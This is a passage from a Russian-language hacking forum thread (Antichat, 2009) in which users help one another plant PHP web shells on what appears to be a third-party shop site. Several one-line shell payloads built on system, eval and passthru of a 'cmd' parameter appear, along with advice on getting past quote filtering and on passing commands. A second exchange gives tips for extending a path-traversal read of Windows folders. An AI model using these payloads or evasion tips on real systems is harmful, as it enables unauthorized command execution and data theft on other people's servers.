ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10051  
Старый 12.11.2009, 13:51
Аватар для Aртем
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от sideup  
Добрый день!

Подскажите пожалуйста

не могу записать в файл на сервере код CMD

<?php system($_GET["cmd"]); ?>

сервер походу фильтрует кавычки.

Подскажите как это обойти, чтобы получить шелл.

Или это невозможно?
печальный вопрос
Код:
<?system($_GET[cmd])?> 
<?eval($_GET[cmd])?>
<?passthru($_GET[cmd])?>
<?eval($_REQUEST[cmd])?>
<?passthru($_REQUEST[cmd])?>
<?system($_REQUEST[cmd])?>
и да, мне интересно через что ты заливаешь шелл?
если через скулинъект, то как бы ты не сможешь вообще ничего залить если у тебя как ты говоришь ГПЦ=ОН

Последний раз редактировалось Aртем; 12.11.2009 в 14:01..
 
Ответить с цитированием

  #10052  
Старый 12.11.2009, 14:33
Аватар для sideup
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161

Репутация: 0
По умолчанию

Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.
 
Ответить с цитированием

  #10053  
Старый 12.11.2009, 14:40
Аватар для icekvot
icekvot
Новичок
Регистрация: 12.10.2007
Сообщений: 14
Провел на форуме:
80412

Репутация: 7
По умолчанию

Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
 
Ответить с цитированием

  #10054  
Старый 12.11.2009, 14:48
Аватар для Aртем
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от sideup  
Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.
а ты передавал команды?
 
Ответить с цитированием

  #10055  
Старый 12.11.2009, 14:50
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Цитата:
Сообщение от sideup  
Warning: Wrong parameter count for system() in

/home/site-shop.com/site/site/shell.php on line 1

При выполнении шелла такая ошибка.
кагбэ так:

http://127.0.0.1/index.php?cmd=ls
и т д
 
Ответить с цитированием

  #10056  
Старый 12.11.2009, 14:53
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от icekvot  
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
возможно надо сделать "Documents\ and\ Settings"
 
Ответить с цитированием

  #10057  
Старый 12.11.2009, 14:54
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от icekvot  
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
В Documents and Setting незайдёшь из шелла, ибо прав нету =\
 
Ответить с цитированием

  #10058  
Старый 12.11.2009, 15:01
Аватар для Aртем
Aртем
Познающий
Регистрация: 18.10.2009
Сообщений: 68
Провел на форуме:
330834

Репутация: 90
По умолчанию

Цитата:
Сообщение от icekvot  
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.
в DOS формате заюзать попробуй
 
Ответить с цитированием

  #10059  
Старый 12.11.2009, 15:02
Аватар для sideup
sideup
Новичок
Регистрация: 10.04.2008
Сообщений: 8
Провел на форуме:
20161

Репутация: 0
По умолчанию

Цитата:
Сообщение от -m0rgan-  
кагбэ так:

http://127.0.0.1/index.php?cmd=ls
и т д

Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.
 
Ответить с цитированием

  #10060  
Старый 12.11.2009, 15:04
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от sideup  
Да. Конечно. Но ничего.

Пробовал <?php phpinfo(); ?> работает отлично.

Залил вот это <?php%20@eval(\$_POST[cmd]);?> ошибок

не выдаёт, но что-то не пойму как команды выполнять

shell.php?cmd=id не катит.
переметру cmd передавай пых код
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ